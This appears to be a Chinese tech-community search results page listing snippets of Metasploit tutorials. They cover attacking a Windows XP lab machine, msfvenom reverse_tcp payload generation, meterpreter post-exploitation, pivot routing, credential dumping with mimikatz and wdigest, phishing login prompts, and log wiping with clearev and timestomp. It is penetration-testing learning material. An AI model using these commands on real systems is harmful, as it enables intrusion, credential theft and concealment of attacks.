首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

kali linux&入侵XP系统——MSF初体验

首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。 Metasploit 是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。...Metasploit的设计初衷是打造成一个攻击工具开发平台,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。 说再多也不如真情实弹的干不是。...我用VMware搭建了一个实验环境,下面是网络的拓扑图: ? 要做的就是用Kali Linux里的Metasploit入侵WinXP,然后从物理机,也就是Win7的远程桌面连进WinXP 系统。...Metasploit 就是一款这么强大的工具,使渗透测试人员如虎添翼,几个命令就入侵了目标主机。它的强大功能不言而喻。...接下来,我会继续研究Metasploit的使用,并记录自己的学习过程,希望能给各位一定的帮助。

4.4K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    MSF后渗透利用整理|MSF命令大全三

    八、 路由设置 实验机: MSF攻击机:202.192.29.17 跳板机:202.192.29.45 内网目标机:192.168.118.129 这里从我们已经拿下了跳板机开始,我们直接使用msfvenom...设置好msf配置信息: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST...设置好路由之后,我们就可以对内网进行扫描了,做一个简单的测试,扫描内网的3389端口: ? 我们试着内网主机进行扫描,查看是否存在ms17_010漏洞: ?...九、清除痕迹 1.clearev 在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹: ? ? ?...2.timestomp 将时间统一,减少被发现的概率 3.systeminfo 查看是否少了补丁 ?

    1.3K20

    MSF后渗透利用整理|MSF命令大全一

    后渗透脚本知识 权限维持、权限提升、内网渗透等 内网渗透:信息搜集、读取用户hash、浏览器密码 域渗透:获取域控的控制权 Meterpreter基本概念 Meterpreter是Metasploit框架中的一个扩展模块...,在攻击成 功以后给我们返回一个控制通道,是metsploit后渗透必不可少的 ,它具有强大的功能,包括socks代理,端口转发,键盘监听等多 个功能,meterpreter可以说是内网渗透测试神器。...meterpreter的 动态链接库到目标进程的空间中,使得meterpreter启动隐蔽,很难被杀毒软 件检测到; 一、后渗透基本操作 1.基本命令 background # 让meterpreter...run post/windows/gather/dumplinks #获取最近的文件操作 run scraper #获取常见信息 #保存在~/.msf4/logs/scripts/scraper/目录下...meterpreter > ssp #获取明文信息 meterpreter > wdigest #获取系统账户信息 meterpreter > mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

    7.6K10

    MSF学习(一)

    MSF最初由HD Moore于2003年创建,现在由Rapid7维护和发展。 因为msf是一个框架,所以可以根据自己的需求进行功能开发。...详解 msf体系图 msf在kali目录 主目录在\usr\share\metasploit-framework data目录包含Metasploit用于存储某些漏洞利用、单词列表、图像等所需的二进制文件的可编辑文件...也是最主要的模块,是接下来重点学习的部分 plugins目录存储着msf的插件 scripts目录存储着脚本文件 tools目录中有各种有用的命令行实用程序 modules模块 modules既上文提到的...包含了很多模块,这些模块是msf最主要最常用的功能,基本上包含了整个渗透流程所需工具。...,用于生成一些免杀木马 msfcli msfcli是早期的msf命令行接口,可以通过此接口来使用一些msf功能模块。

    31520

    MSF后渗透利用整理|MSF命令大全二

    –u #列出目标主机用户的可用令牌 ④list_tokens –g #列出目标主机用户组的可用令牌 ?...run scraper #获取常见信息 #保存在~/.msf4/logs/scripts/scraper/目录下 run post/windows/gather/enum_patches #补丁信息...当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀毒软件 ?...该方式是在目标机器上以反弹回连方式来连接攻击者的”服务器”,目标机器上的防火墙对于此等操作一般均会放行,因此后门的存活率较高。...-h 这个帮助菜单 -i 每次连接尝试之间的时间间隔(秒) -p 运行Metasploit的系统正在侦听的端口 ,即设置反向连接的端口号 -r 运行Metasploit监听连接的系统的IP 例子: ?

    3.6K50

    Pentestbox更新MSF问题

    {介绍} PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境,其中更新MSF,是一个比较头痛的问题,这里就大概讲下是如何爬过这个坑的。...替换文件的时候,最好把PentestBox关掉。 替换过后,运行PentestBox,看看ruby有没有替换成功。 如上图所示,是替换成功了,再来运行MSF看看能不能运行起来。...(全部更新快慢取决你的网速)更新完后,再次运行MSF报告如下错。...那么也是不要管它(如果你想管那就去读懂它的意思,我英痴,无法人工翻译,请自行百度自动翻译)这里进行替换MSF,把原有MSF全部删掉,需要注意的是关掉PentestBox删除,如果不关掉会占着进程删不掉。...,如果你知道下载的文件位置也可以不要进到此目录下载,我这样做只是比较方便点) MSF下载完后,运MSF,依然报错,这次报错无法找到兼容版本。

    4.8K90

    MSF中好玩的Post 模块

    一旦受害者机器必须被攻击者入侵,攻击者可以使用msf后期利用模块来收集有关受害者的信息或证据。...metasploit 框架中有478 个后期开发模块可用,在 post 模块的帮助下,让后期的渗透会变得更有趣。 本文将为你介绍常用的几个post模块的使用,感兴趣就收藏吧!...如下,当我们成功得到系统的shell后,便可以建立有趣的post模块 了。 Windows凭据钓鱼 当我们无法得到系统管理员的密码时,可以利用此模块用于通过弹出登录提示框,对目标机器进行钓鱼攻击。...更改密码 本模块将帮助我们更改目标机器的窗口登录密码。 在 multi/handler 上执行这些给定的命令来执行攻击。 注意:要执行此攻击,我们必须具有管理员权限。...Windows 屏幕收集 在这个模块中,攻击者可以匿名获取受害者机器的桌面截图。 您需要在 multi/handler 上输入这些给定的命令。

    98820

    msf在后渗透中的利用

    shellcode/可执行文件时使用的payload相同,否则可能会出现session有建立但是激活时靶机报段错误的情况,如下图: 四、 payload生成 可执行文件 Linux 反向 msfvenom...-p linux/x64/meterpreter/reverse_tcp LHOST=192.168.115.34 LPORT=35650 -f elf 正向 msfvenom -p linux...,来获得一个meterpreter的shell linux可以使用系统自带的base64 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.115.34...: uname -ms:打印CPU构架(32/64位)和系统类型(linux/windows等),用于选择对应的可执行文件格式 第一个echo估计是用于测试是否成功建立shell连接的 将uname加起来的前后字符都是随机字符...,所以没有添加成功) 八、 msf做代理 当做好上述的路由转发后,可以使用msf的auxiliary/server/socks5将作为代理供其他程序使用 use auxiliary/server/socks5set

    2K21

    工具的使用|MSF中mimikatz模块的使用

    目录 mimikatz模块的加载 mimikatz模块的使用 mimikatz_command模块的用法 mimikatz模块的加载 MSF中的mimikatz模块,可以列举出系统中的各种凭据,以及执行一些...mimikatz相关的命令。...目前,该模块已经更新为功能更全的kiwi模块,传送门:工具的使用 | MSF中kiwi模块的使用 使用 mimikatz 模块需要System权限,所以我们在使用该模块之前需要将当前MSF中的shell...相关的模块 livessp:尝试检索livessp凭据 mimikatz_command:运行一个定制的命令 msv:msv凭证相关的模块,列出目标主机的用户密码哈希 ssp:ssp凭证相关的模块 tspkg...:tspkg凭证相关的模块 wdigest:wdigest凭证相关的模块 mimikatz_command模块的用法 mimikatz_command 模块可以让我们使用mimikatz的全部功能。

    1.8K10

    MSF基础与应用

    什么是MSF? Metasploit框架(简称MSF)是一个 开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。...MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。...MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。因此MSF的更新使用kali上的更新命令和更新源即可。...MSF介绍 MSF推荐通过控制台接口使用,打开Kali终端,输入msfconsole就能够进入到控制台操作界面 msfconsole ?...然后百度寻找有没有可利用的模板 ms08_067 漏洞,意思就是msf在2008年收录的第67个漏洞 ? 找到后,打开kali,开启msfconsole ? ?

    1.4K52
    领券